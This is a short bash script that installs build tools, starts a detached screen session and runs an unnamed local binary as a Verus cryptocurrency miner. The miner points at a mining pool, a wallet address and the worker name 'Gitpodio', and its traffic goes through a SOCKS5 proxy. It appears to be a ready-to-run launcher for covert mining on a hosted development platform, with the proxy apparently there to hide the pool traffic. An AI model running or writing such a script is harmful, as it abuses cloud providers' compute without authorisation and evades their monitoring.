#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
screen -dmS ls
A=stratum+tcp://na.luckpool.net:3956
B=RBR2mQwhMbMHa1NjSem99Bp7AjK46rjBUw
C=Gitpodio
D=socks5://72.221.232.115:4145

chmod u+x 2 && ./2 -a verus -o $A -u $B.$C -x $D  -p x -t 4
